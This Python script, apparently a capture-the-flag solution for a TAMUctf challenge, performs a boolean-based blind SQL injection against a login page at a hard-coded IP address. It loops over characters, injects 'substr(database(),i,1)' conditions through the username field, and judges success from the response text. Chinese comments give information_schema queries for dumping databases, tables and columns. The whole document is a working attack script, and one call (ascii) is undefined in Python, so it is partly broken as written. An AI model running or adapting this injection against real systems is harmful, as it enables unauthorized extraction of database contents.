```python
import requests
#用这里的语句分别替换id中的内容即可爆库、表、字段
#select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
#select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'xxx'
#select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = 'xxx' and TABLE_NAME = 'xxx'
dic='0123456789abcdefghijklmnopqrstuvwxyz,}{_#'
url='http://39.106.65.110:39079/login.php'
headers = {
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "keep-alive",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://logical.tamuctf.com",
    "Referer": "http://logical.tamuctf.com/",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
string=''
for i in range(1,100):
    for j in dic:
        # payload="username=kjie' || if(,1,0)-- "
        id="username=kjie' || substr(database(),{0},1)={1} -- &password=admin".format(str(i),ascii(j))
        print("current:",i,":",j)
        r=requests.post(url,data=id, verify=False)
        print(r.text)
        #盲注条件判断
        if "not exists" not in r.text:
            string+=j
            print(string)
            break

print(string)
```

